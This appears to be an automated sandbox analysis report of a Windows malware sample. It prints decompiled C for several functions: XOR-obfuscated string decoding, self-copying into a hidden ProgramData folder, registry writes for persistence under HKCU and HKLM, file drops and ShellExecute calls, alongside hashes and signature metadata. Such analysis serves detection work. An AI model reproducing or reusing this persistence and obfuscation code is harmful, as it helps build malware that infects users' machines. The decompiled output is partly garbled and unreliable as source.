0x00e89ef5
0x00e89ef7
0x00e89f00
0x00e89f0a
0x00e89f0f
0x00e89f17
0x00e89f1e
0x00e89f1e
0x00e89f20
0x00e89f25
0x00e89f29
0x00e89f31
0x00e89f38
0x00e89f3d
0x00e89f41
0x00e89f46
0x00e89f48
0x00e89f4a
0x00e89f4a
0x00e89f4c
0x00e89f4d
0x00e89f55
0x00e89f57
0x00e89f58
0x00e89f58
0x00e89f5b
0x00e89f5c
0x00e89f60
0x00e89f69
0x00e89f6c
0x00e89f73
0x00e89f73
0x00e89f75
0x00e89f7a
0x00e89f7e
0x00e89f86
0x00e89f8d
0x00e89f92
0x00e89f9a
0x00e89fa2
0x00e89fa9
0x00e89fae
0x00e89fb0
0x00e89fb2
0x00e89fb2
0x00e89fb4
0x00e89fb5
0x00e89fbd
0x00e89fbf
0x00e89fc0
0x00e89fc0
0x00e89fc3
0x00e89fc4
0x00e89fc8
0x00e89fd1
0x00e89fd4
0x00e89fdb
0x00e89fdb
0x00e89fdd
0x00e89fe2
0x00e89fe6
0x00e89fee
0x00e89ff5
0x00e89ffa
0x00e8a001
0x00e8a008
0x00e8a00d
0x00e8a012
0x00e8a014
0x00e8a016
0x00e8a016
0x00e8a018
0x00e8a019
0x00e8a021
0x00e8a023
0x00e8a024
0x00e8a024
0x00e8a027
0x00e8a028
0x00e8a02c
0x00e8a035
0x00e8a038
0x00e8a03f
0x00e8a03f
0x00e8a041
0x00e8a046
0x00e8a04a
0x00e8a052
0x00e8a059
0x00e8a05e
0x00e8a066
0x00e8a06e
0x00e8a072
0x00e8a077
0x00e8a079
0x00e8a07b
0x00e8a07b
0x00e8a07d
0x00e8a07e
0x00e8a086
0x00e8a088
0x00e8a089
0x00e8a089
0x00e8a08c
0x00e8a08d
0x00e8a093
0x00e8a09a
0x00e8a09d
0x00e8a0a4
0x00e8a0a4
0x00e8a0a6
0x00e8a0aa
0x00e8a0b2
0x00e8a0b7
0x00e8a0bf
0x00e8a0c3
0x00e8a0c8
0x00e8a0ca
0x00e8a0cc
0x00e8a0cc
0x00e8a0ce
0x00e8a0cf
0x00e8a0d3
0x00e8a0d7
0x00e8a0d9
0x00e8a0dc
0x00e8a0dc
0x00e8a0df
0x00e8a0e0
0x00e8a0e6
0x00e8a0e9
0x00e8a0f0
0x00e8a0f0
0x00e8a0f2
0x00e8a0f4
0x00e8a0f4
0x00e8a0f7
0x00e8a0f8
0x00e8a0fc
0x00e8a0fe
0x00e8a101
0x00e8a101
0x00e8a104
0x00e8a105
0x00e8a109
0x00e8a112
0x00e8a115
0x00e8a11c
0x00e8a11c
0x00e8a11e
0x00e8a122
0x00e8a127
0x00e8a12c
0x00e8a12e
0x00e8a130
0x00e8a130
0x00e8a132
0x00e8a133
0x00e8a137
0x00e8a139
0x00e8a13c
0x00e8a13c
0x00e8a13f
0x00e8a140
0x00e8a146
0x00e8a14e
0x00e8a153
0x00e8a153
0x00e8a157
0x00e8a163
0x00e8a170
0x00e8a170
0x00e8a172
0x00e8a176
0x00e8a17a
0x00e8a18c
0x00e8a194
0x00e8a19e
0x00e8a1a6
0x00e8a1ae
0x00e8a1b6
0x00e8a1ba
0x00e8a1cc
0x00e8a1d4
0x00e8a1e6
0x00e8a1ee
0x00e8a1f6
0x00e8a1fa
0x00e8a20c
0x00e8a214
0x00e8a226
0x00e8a22e
0x00e8a236
0x00e8a23a
0x00e8a24c
0x00e8a254
0x00e8a263
0x00e8a26b
0x00e8a273
0x00e8a277
0x00e8a289
0x00e8a2a4

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00E8A18C
ShellExecuteA.SHELL32(00000000,00000000,00000000,/1'-,00000000,00000000), ref: 00E8A1CC
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00E8A20C
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00E8A24C
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00E8A289

Strings

\#6Z, xrefs: 00E89FE6
'$%+, xrefs: 00E89E0E
/1'-, xrefs: 00E8A26B
;ih, xrefs: 00E89E16
L3'", xrefs: 00E8A04A
H7'K, xrefs: 00E8A05E
!=#, xrefs: 00E8A263
/1'-, xrefs: 00E8A19E
V, xrefs: 00E89FFA
N, xrefs: 00E89FA2
52'1, xrefs: 00E89D21
:-CI, xrefs: 00E8A066
p~66, xrefs: 00E8A0AA
F8A/, xrefs: 00E89CC2
o"b*, xrefs: 00E89DA0
:,vu, xrefs: 00E8A0B7

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: !=#$'$%+$/1'-$/1'-$52'1$:,vu$:-CI$;ih$F8A/$H7'K$L3'"$N$V$\#6Z$o"b*$p~66
API String ID: 587946157-647236628
Opcode ID: 795c70fad6ca0b5c7a6482b80b4fc87f0fb5ace29ece480d639fc849d60e0748
Instruction ID: 361b2d841d4ce94505d33c36d9b46f45ffb7ad4abef0623b0032c206beef3ee5
Opcode Fuzzy Hash: 795c70fad6ca0b5c7a6482b80b4fc87f0fb5ace29ece480d639fc849d60e0748
Instruction Fuzzy Hash: B80224605087859FDB16EF38895067BFBE2BFD9704F446A0CF8CA67212DB319949CB12

Uniqueness

Uniqueness Score: -1.00%

Function 00E899C5, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00E899C5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t55;
				intOrPtr _t57;
				char _t60;
				void _t61;
				void _t62;
				void _t66;
				void _t67;
				void _t70;
				void _t71;
				void* _t73;
				void _t75;
				void _t76;
				int _t78;
				char* _t79;
				char* _t80;
				void* _t85;
				signed int _t86;
				char* _t87;
				void* _t90;
				intOrPtr* _t91;
				signed int _t93;
				void* _t98;
				signed int _t100;
				signed int _t106;
				void* _t111;
				signed int _t113;
				void* _t123;
				void* _t124;
				signed int _t125;
				void* _t126;
				signed int _t127;
				intOrPtr _t129;
				void* _t130;
				void* _t135;
				void* _t140;
				void* _t145;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t158;
				signed int _t159;
				signed int _t161;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;

				_t55 =  *0xea9014; // 0xa413846
				 *(_t161 + 0x3c) = _t55 ^ _t161;
				_t85 =  *(_t161 + 0x4c);
				_t158 =  *(_t161 + 0x4c);
				_push(0x208);
				_t57 = E00E909A2();
				asm("movaps xmm0, [0xe7dcd0]");
				_t129 = _t57;
				 *((intOrPtr*)(_t161 + 0x18)) = _t129;
				_t90 = 0;
				asm("movups [esp+0x20], xmm0");
				 *((intOrPtr*)(_t161 + 0x30)) = 0x73372531;
				 *((intOrPtr*)(_t161 + 0x34)) = 0x7738217b;
				 *((char*)(_t161 + 0x38)) = 0;
				do {
					_t8 = _t90 + 0x40; // 0x40
					 *(_t161 + _t90 + 0x20) =  *(_t161 + _t90 + 0x20) ^ _t8;
					_t90 = _t90 + 1;
				} while (_t90 < 0x18);
				_t91 = _t161 + 0x20;
				 *((char*)(_t161 + 0x38)) = 0;
				_t123 = _t129 - _t91;
				do {
					_t60 =  *_t91;
					 *((char*)(_t123 + _t91)) = _t60;
					_t91 = _t91 + 1;
				} while (_t60 != 0);
				_t152 = _t85;
				do {
					_t61 =  *_t85;
					_t85 = _t85 + 1;
				} while (_t61 != 0);
				_t86 = _t85 - _t152;
				_t130 = _t129 - 1;
				do {
					_t62 =  *(_t130 + 1);
					_t130 = _t130 + 1;
				} while (_t62 != 0);
				 *((intOrPtr*)(_t161 + 0x10)) = 0x31366e60;
				_t93 = _t86 >> 2;
				memcpy(_t130, _t152, _t93 << 2);
				_t162 = _t161 + 0xc;
				 *((short*)(_t162 + 0x14)) = 0x64;
				memcpy(_t152 + _t93 + _t93, _t152, _t86 & 0x00000003);
				_t163 = _t162 + 0xc;
				_t98 = 0;
				do {
					_t20 = _t98 + 0x40; // 0x40
					 *(_t163 + _t98 + 0x10) =  *(_t163 + _t98 + 0x10) ^ _t20;
					_t98 = _t98 + 1;
				} while (_t98 < 5);
				_t25 = _t163 + 0x10; // 0x31366e60
				_t124 = _t25;
				 *((char*)(_t163 + 0x15)) = 0;
				_t153 = _t124;
				do {
					_t66 =  *_t124;
					_t124 = _t124 + 1;
				} while (_t66 != 0);
				_t87 =  *(_t163 + 0x18);
				_t125 = _t124 - _t153;
				_t135 = _t87 - 1;
				do {
					_t67 =  *(_t135 + 1);
					_t135 = _t135 + 1;
				} while (_t67 != 0);
				_t100 = _t125 >> 2;
				memcpy(_t135, _t153, _t100 << 2);
				memcpy(_t153 + _t100 + _t100, _t153, _t125 & 0x00000003);
				_t165 = _t163 + 0x18;
				_t154 = _t158;
				do {
					_t70 =  *_t158;
					_t158 = _t158 + 1;
				} while (_t70 != 0);
				_t159 = _t158 - _t154;
				_t140 = _t87 - 1;
				do {
					_t71 =  *(_t140 + 1);
					_t140 = _t140 + 1;
				} while (_t71 != 0);
				asm("movaps xmm0, [0xe7def0]");
				_t106 = _t159 >> 2;
				memcpy(_t140, _t154, _t106 << 2);
				_t166 = _t165 + 0xc;
				 *((intOrPtr*)(_t166 + 0x40)) = 0x5a5b5859;
				 *((intOrPtr*)(_t166 + 0x44)) = 0x475f505e;
				asm("movups [esp+0x20], xmm0");
				 *((short*)(_t166 + 0x48)) = 0xf47;
				asm("movaps xmm0, [0xe7dee0]");
				_t73 = memcpy(_t154 + _t106 + _t106, _t154, _t159 & 0x00000003);
				_t167 = _t166 + 0xc;
				asm("movups [esp+0x30], xmm0");
				 *(_t167 + 0x4a) = _t73;
				_t111 = 0;
				do {
					_t38 = _t111 + 0x40; // 0x40
					 *(_t167 + _t111 + 0x20) =  *(_t167 + _t111 + 0x20) ^ _t38;
					_t111 = _t111 + 1;
				} while (_t111 < 0x2a);
				_t126 = _t167 + 0x20;
				 *(_t167 + 0x4a) = 0;
				_t155 = _t126;
				do {
					_t75 =  *_t126;
					_t126 = _t126 + 1;
				} while (_t75 != 0);
				_t127 = _t126 - _t155;
				_t145 = _t87 - 1;
				do {
					_t76 =  *(_t145 + 1);
					_t145 = _t145 + 1;
				} while (_t76 != 0);
				 *((intOrPtr*)(_t167 + 0x10)) = 0x6d262c23;
				_t113 = _t127 >> 2;
				_t78 = memcpy(_t145, _t155, _t113 << 2);
				_t168 = _t167 + 0xc;
				 *((intOrPtr*)(_t168 + 0x14)) = 0x233d21;
				 *((intOrPtr*)(_t168 + 0x18)) = 0x2d27312f;
				_t79 = memcpy(_t155 + _t113 + _t113, _t155, _t127 & 0x00000003);
				_t169 = _t168 + 0xc;
				 *(_t168 + 0x34) = _t79;
				_t80 = E00E86346(_t169 + 0x1c);
				ShellExecuteA(0, E00E832BE(_t169 + 0x28), _t80, _t87, _t79, _t78); // executed
				return E00E8AE43( *(_t169 + 0x4c) ^ _t169);
			}

0x00e899c8
0x00e899cf
0x00e899d4
0x00e899d9
0x00e899df
0x00e899e4
0x00e899e9
0x00e899f0
0x00e899f3
0x00e899f7
0x00e899f9
0x00e899fe
0x00e89a06
0x00e89a0e
0x00e89a13
0x00e89a13
0x00e89a16
0x00e89a1a
0x00e89a1b
0x00e89a20
0x00e89a24
0x00e89a2d
0x00e89a2f
0x00e89a2f
0x00e89a31
0x00e89a34
0x00e89a35
0x00e89a39
0x00e89a3b
0x00e89a3b
0x00e89a3d
0x00e89a3e
0x00e89a42
0x00e89a44
0x00e89a45
0x00e89a45
0x00e89a48
0x00e89a49
0x00e89a4f
0x00e89a57
0x00e89a5a
0x00e89a5a
0x00e89a5e
0x00e89a68
0x00e89a68
0x00e89a6a
0x00e89a6c
0x00e89a6c
0x00e89a6f
0x00e89a73
0x00e89a74
0x00e89a79
0x00e89a79
0x00e89a7d
0x00e89a82
0x00e89a84
0x00e89a84
0x00e89a86
0x00e89a87
0x00e89a8b
0x00e89a8f
0x00e89a91
0x00e89a94
0x00e89a94
0x00e89a97
0x00e89a98
0x00e89a9e
0x00e89aa1
0x00e89aa8
0x00e89aa8
0x00e89aaa
0x00e89aac
0x00e89aac
0x00e89aaf
0x00e89ab0
0x00e89ab4
0x00e89ab6
0x00e89ab9
0x00e89ab9
0x00e89abc
0x00e89abd
0x00e89ac1
0x00e89aca
0x00e89acd
0x00e89acd
0x00e89ad1
0x00e89adc
0x00e89ae4
0x00e89ae9
0x00e89af0
0x00e89af7
0x00e89af7
0x00e89af9
0x00e89afe
0x00e89b02
0x00e89b04
0x00e89b04
0x00e89b07
0x00e89b0b
0x00e89b0c
0x00e89b11
0x00e89b15
0x00e89b1a
0x00e89b1c
0x00e89b1c
0x00e89b1e
0x00e89b1f
0x00e89b23
0x00e89b25
0x00e89b28
0x00e89b28
0x00e89b2b
0x00e89b2c
0x00e89b32
0x00e89b3a
0x00e89b3f
0x00e89b3f
0x00e89b43
0x00e89b4e
0x00e89b57
0x00e89b57
0x00e89b5f
0x00e89b63
0x00e89b75
0x00e89b8d

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00E89B75

Strings

`n61, xrefs: 00E89A79
^P_G, xrefs: 00E89ADC
/1'-, xrefs: 00E89B4E
1%7s, xrefs: 00E899FE
!=#, xrefs: 00E89B43
{!8w, xrefs: 00E89A06
YX[Z, xrefs: 00E89AD1
F8A/, xrefs: 00E899C8

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: !=#$/1'-$1%7s$F8A/$YX[Z$^P_G$`n61${!8w
API String ID: 587946157-4089589074
Opcode ID: fe22483f8fccec3e961c60ef08ec6451973163e0daa11b319625636882a5cf24
Instruction ID: 203c785a50ddc546f9add1ea0eedb864f22c6c595d857ef8ded008a7af98df55
Opcode Fuzzy Hash: fe22483f8fccec3e961c60ef08ec6451973163e0daa11b319625636882a5cf24
Instruction Fuzzy Hash: 995138715087854FCB19DF28985067BFBE1BFDA344F04168DE8CA6B213DB22990AC762

Uniqueness

Uniqueness Score: -1.00%

Function 00E92E1C, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E92E1C(int _a4) {
				void* _t14;

				if(E00E99643(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00E92E5E(_t14, _a4);
				ExitProcess(_a4);
			}

0x00e92e29
0x00e92e45
0x00e92e45
0x00e92e4e
0x00e92e57

APIs

GetCurrentProcess.KERNEL32(?,?,00E92E1B,00000001,00000000,?,00000001,?,00E98F84), ref: 00E92E3E
TerminateProcess.KERNEL32(00000000,?,00E92E1B,00000001,00000000,?,00000001,?,00E98F84), ref: 00E92E45
ExitProcess.KERNEL32 ref: 00E92E57

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e8b003fc2d481d75dccb54f9b5db35b7f35fa40923e838560c0f0981e0ee11bc
Instruction ID: 870b7c22103d2e4e104591c3f647490b1cacf62d250039a08d44161640d8869b
Opcode Fuzzy Hash: e8b003fc2d481d75dccb54f9b5db35b7f35fa40923e838560c0f0981e0ee11bc
Instruction Fuzzy Hash: 14E08C31410108BFCF22AF65DE8CD493FA9EF59341B00441CFA45A6232CB39ED46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00E89B90, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E89B90(void* __ebx, void* __esi, char* _a4, char* _a8) {
				signed int _v8;
				char _v11;
				short _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v56;
				void* _v60;
				char* _v64;
				signed int _t37;
				char _t43;
				char _t50;
				char* _t55;
				int _t58;
				char* _t59;
				int _t61;
				char* _t62;
				char* _t67;
				char* _t69;
				char* _t71;
				signed int _t73;

				_t37 =  *0xea9014; // 0xa413846
				_v8 = _t37 ^ _t73;
				asm("movaps xmm0, [0xe7dbe0]");
				_t55 = _a8;
				_t58 = 0;
				asm("movups [ebp-0x34], xmm0");
				asm("movaps xmm0, [0xe7ddb0]");
				_t71 = _a4;
				_v64 = _t55;
				asm("movups [ebp-0x24], xmm0");
				_v24 = 0x634150e;
				_v20 = 0x80f1616;
				_v16 = 0x1e383506;
				_v12 = 2;
				do {
					_t9 = _t58 + 0x40; // 0x40
					 *(_t73 + _t58 - 0x34) =  *(_t73 + _t58 - 0x34) ^ _t9;
					_t58 = _t58 + 1;
				} while (_t58 < 0x2d);
				_v11 = 0;
				RegOpenKeyExA(0x80000001,  &_v56, 0, 2,  &_v60); // executed
				_t59 = _t71;
				_t17 =  &(_t59[1]); // 0x1
				_t67 = _t17;
				do {
					_t43 =  *_t59;
					_t59 =  &(_t59[1]);
				} while (_t43 != 0);
				RegSetValueExA(_v60, _t55, 0, 1, _t71, _t59 - _t67); // executed
				RegCloseKey(_v60); // executed
				asm("movaps xmm0, [0xe7dbd0]");
				asm("movups [ebp-0x34], xmm0");
				_t61 = 0;
				_v24 = 0x634150e;
				asm("movaps xmm0, [0xe7ddb0]");
				asm("movups [ebp-0x24], xmm0");
				_v20 = 0x80f1616;
				_v16 = 0x1e383506;
				_v12 = 2;
				do {
					_t24 = _t61 + 0x40; // 0x40
					 *(_t73 + _t61 - 0x34) =  *(_t73 + _t61 - 0x34) ^ _t24;
					_t61 = _t61 + 1;
				} while (_t61 < 0x2d);
				_v11 = 0;
				RegOpenKeyExA(0x80000002,  &_v56, 0, 2,  &_v60); // executed
				_t62 = _t71;
				_t32 =  &(_t62[1]); // 0x1
				_t69 = _t32;
				do {
					_t50 =  *_t62;
					_t62 =  &(_t62[1]);
				} while (_t50 != 0);
				RegSetValueExA(_v60, _v64, 0, 1, _t71, _t62 - _t69); // executed
				RegCloseKey(_v60);
				return E00E8AE43(_v8 ^ _t73);
			}

0x00e89b96
0x00e89b9d
0x00e89ba0
0x00e89baa
0x00e89bad
0x00e89baf
0x00e89bb4
0x00e89bbb
0x00e89bbe
0x00e89bc1
0x00e89bc5
0x00e89bcc
0x00e89bd3
0x00e89bda
0x00e89be0
0x00e89be0
0x00e89be3
0x00e89be7
0x00e89be8
0x00e89bf0
0x00e89c00
0x00e89c06
0x00e89c08
0x00e89c08
0x00e89c0b
0x00e89c0b
0x00e89c0d
0x00e89c0e
0x00e89c24
0x00e89c29
0x00e89c2f
0x00e89c38
0x00e89c3c
0x00e89c3e
0x00e89c45
0x00e89c4c
0x00e89c50
0x00e89c57
0x00e89c5e
0x00e89c64
0x00e89c64
0x00e89c67
0x00e89c6b
0x00e89c6c
0x00e89c74
0x00e89c84
0x00e89c8a
0x00e89c8c
0x00e89c8c
0x00e89c8f
0x00e89c8f
0x00e89c91
0x00e89c92
0x00e89ca4
0x00e89ca9
0x00e89cbc

APIs

RegOpenKeyExA.KERNELBASE(80000001,?,00000000,00000002,?,00000000,00000000), ref: 00E89C00
RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,00000000,00000001,?,?,?,?,?,?,?,?,?,00E892BD), ref: 00E89C24
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E892BD), ref: 00E89C29
RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000002,?,?,?,?,?,?,?,?,?,?,00E892BD), ref: 00E89C84
RegSetValueExA.KERNELBASE(?,?,00000000,00000001,00000000,00000001,?,?,?,?,?,?,?,?,?,00E892BD), ref: 00E89CA4
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00E892BD), ref: 00E89CA9

Strings

F8A/, xrefs: 00E89B96

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenValue
String ID: F8A/
API String ID: 779948276-73971870
Opcode ID: 6494844ce319132a86748d583b4a00db661ec004ba517926036b51d986000b01
Instruction ID: edb0773879c6feececea0b20a00124920fc17d3ea8d96c34a19d2140277a220e
Opcode Fuzzy Hash: 6494844ce319132a86748d583b4a00db661ec004ba517926036b51d986000b01
Instruction Fuzzy Hash: C8410234905248AFEB05CFA5DD84AFDBBB6FF49308F148158F94576222E7315A89CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00E88BA1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E88BA1(void* __ebx, void* __edi, void* __esi) {
				signed int _t14;
				void _t17;
				void* _t21;
				void _t22;
				void* _t26;
				void* _t32;
				signed int _t33;
				signed int _t37;
				signed int _t44;
				void* _t51;
				signed int _t52;
				void* _t54;
				void* _t59;
				void* _t66;
				void* _t67;
				void* _t68;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;

				_t14 =  *0xea9014; // 0xa413846
				 *(_t73 + 0x18) = _t14 ^ _t73;
				_t32 =  *(_t73 + 0x24);
				_push(__edi);
				E00E8D0F0(__edi, 0xeaafe0, 0, 0x104);
				_t74 = _t73 + 0xc;
				 *((intOrPtr*)(_t74 + 0x10)) = 0xc8;
				_t66 = _t32;
				do {
					_t17 =  *_t32;
					_t32 = _t32 + 1;
				} while (_t17 != 0);
				_t33 = _t32 - _t66;
				_t54 = 0xeaafdf;
				do {
					_t5 = _t54 + 1; // 0x505c3a43
					_t54 = _t54 + 1;
				} while ( *_t5 != 0);
				asm("movaps xmm0, [0xe7de00]");
				_t37 = _t33 >> 2;
				memcpy(_t54, _t66, _t37 << 2);
				_t75 = _t74 + 0xc;
				 *((char*)(_t75 + 0x24)) = 0;
				memcpy(_t66 + _t37 + _t37, _t66, _t33 & 0x00000003);
				_t76 = _t75 + 0xc;
				asm("movups [esp+0x14], xmm0");
				_t21 = E00E82846(_t76 + 0x14);
				_t51 = _t21;
				_t67 = _t21;
				do {
					_t22 =  *_t51;
					_t51 = _t51 + 1;
				} while (_t22 != 0);
				_t52 = _t51 - _t67;
				_t59 = 0xeaafdf;
				do {
					_t10 = _t59 + 1; // 0x505c3a43
					_t59 = _t59 + 1;
				} while ( *_t10 != 0);
				_t44 = _t52 >> 2;
				memcpy(_t59, _t67, _t44 << 2);
				memcpy(_t67 + _t44 + _t44, _t67, _t52 & 0x00000003);
				_t78 = _t76 + 0x18;
				_t26 = CreateFileA(0xeaafe0, 0x40000000, 0, 0, 2, 0x10000080, 0); // executed
				_t68 = _t26;
				WriteFile(_t68, 0xe7d850, 0, _t76 + 0x2c, 0); // executed
				CloseHandle(_t68);
				return E00E8AE43( *(_t78 + 0x28) ^ _t78);
			}

0x00e88ba4
0x00e88bab
0x00e88bb0
0x00e88bb6
0x00e88bc4
0x00e88bc9
0x00e88bcc
0x00e88bd4
0x00e88bd6
0x00e88bd6
0x00e88bd8
0x00e88bd9
0x00e88bdd
0x00e88bdf
0x00e88be2
0x00e88be2
0x00e88be5
0x00e88be6
0x00e88bec
0x00e88bf3
0x00e88bf6
0x00e88bf6
0x00e88bff
0x00e88c03
0x00e88c03
0x00e88c09
0x00e88c0e
0x00e88c13
0x00e88c15
0x00e88c17
0x00e88c17
0x00e88c19
0x00e88c1a
0x00e88c1e
0x00e88c20
0x00e88c23
0x00e88c23
0x00e88c26
0x00e88c27
0x00e88c2d
0x00e88c30
0x00e88c46
0x00e88c46
0x00e88c49
0x00e88c50
0x00e88c5e
0x00e88c65
0x00e88c7d

APIs

CreateFileA.KERNELBASE(00EAAFE0,40000000,00000000,00000000,00000002,10000080,00000000), ref: 00E88C49
WriteFile.KERNELBASE(00000000,00E7D850,00000000,?,00000000), ref: 00E88C5E
CloseHandle.KERNEL32(00000000), ref: 00E88C65

Strings

C:\ProgramData\{M055YUNB-FDR0-F9, xrefs: 00E88BBE
F8A/, xrefs: 00E88BA4

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\ProgramData\{M055YUNB-FDR0-F9$F8A/
API String ID: 1065093856-1732422801
Opcode ID: 936de7589cee9cda5c7d85bb27b86514a8dc33991ef1007e13adccc51f88e9c0
Instruction ID: 3bcaa0d3e14a9795cc24f3b93ff03390dc4ae6041acdc9abb4cb2831e62957df
Opcode Fuzzy Hash: 936de7589cee9cda5c7d85bb27b86514a8dc33991ef1007e13adccc51f88e9c0
Instruction Fuzzy Hash: 69214B626086055FD714DF28AD91BABBBD9FB8A344F440258F98A77141DB112E0DC3B1

Uniqueness

Uniqueness Score: -1.00%

Function 00E891F4, Relevance: 7.6, APIs: 5, Instructions: 91
fileCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00E891F4(CHAR* __ecx, void* __eflags) {
				char _v8;
				CHAR* _v12;
				CHAR* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t11;
				CHAR* _t13;
				intOrPtr* _t15;
				void* _t17;
				void* _t19;
				void* _t20;
				int _t22;
				int _t23;
				void* _t29;
				void* _t33;
				char _t36;
				char _t38;
				void* _t41;
				void* _t43;
				void* _t44;
				CHAR* _t46;
				void* _t47;
				CHAR* _t48;
				void* _t49;
				void* _t53;

				_t53 = __eflags;
				_v16 = __ecx;
				_push(0x104);
				_t11 = E00E909A2();
				_push(0x104);
				_v8 = _t11;
				_v12 = E00E909A2();
				_t13 = E00E8903F(0x104,  &_v8,  &_v12, _t44, _t47, _t49, _t53);
				_push(0x104);
				_t48 = _t13;
				_t33 = E00E909A2();
				_t15 = E00E8A582(_t53);
				_t41 = _t33 - _t15;
				do {
					_t36 =  *_t15;
					 *((char*)(_t41 + _t15)) = _t36;
					_t15 = _t15 + 1;
					_t55 = _t36;
				} while (_t36 != 0);
				_push(_t33);
				_push(_v8);
				_push(_t48);
				_t45 = E00E8301E(_t55);
				_t17 = E00E82D46(_t33, _t16, _t48);
				_t56 = _t17;
				if(_t17 != 0) {
					L9:
					__eflags = 0;
					return 0;
				}
				_t19 = E00E8A9CD(_t56, _t45);
				_t20 = E00E82ECE(_t33, _t45, _t48, _t56); // executed
				E00E82FDB(_t56, _t20, _t19);
				_t22 = PathFileExistsA(_t48); // executed
				if(_t22 == 1) {
					goto L9;
				}
				_t46 = _v12;
				_t23 = PathFileExistsA(_t46); // executed
				_t58 = _t23 - 1;
				if(_t23 != 1) {
					CreateDirectoryA(_t46, 0); // executed
					SetFileAttributesA(_t46, 6); // executed
				}
				CopyFileA(_v16, _t48, 0); // executed
				E00E88BA1(_t33, _t46, _t48, _t48);
				E00E899C5(_t33, _t46, _t48, _t58, _t48, _t33);
				E00E89B90(_t33, _t48, _t48, _t33); // executed
				E00E89CBF(_t33, _t46, _t48, _t58, _t46);
				_push(0x104);
				_t29 = E00E909A2();
				_t43 = _t29 - _t48;
				do {
					_t38 =  *_t48;
					 *((char*)(_t43 + _t48)) = _t38;
					_t48 =  &(_t48[1]);
				} while (_t38 != 0);
				return _t29;
			}

0x00e891f4
0x00e89202
0x00e89205
0x00e89206
0x00e8920b
0x00e8920c
0x00e89217
0x00e8921d
0x00e89222
0x00e89223
0x00e8922d
0x00e8922f
0x00e89236
0x00e89238
0x00e89238
0x00e8923a
0x00e8923d
0x00e8923e
0x00e8923e
0x00e89245
0x00e89246
0x00e89249
0x00e8924f
0x00e89251
0x00e89256
0x00e89258
0x00e892de
0x00e892de
0x00000000
0x00e892de
0x00e8925f
0x00e89265
0x00e8926b
0x00e89271
0x00e8927a
0x00000000
0x00000000
0x00e8927c
0x00e89280
0x00e89286
0x00e89289
0x00e8928e
0x00e89297
0x00e89297
0x00e892a3
0x00e892aa
0x00e892b1
0x00e892b8
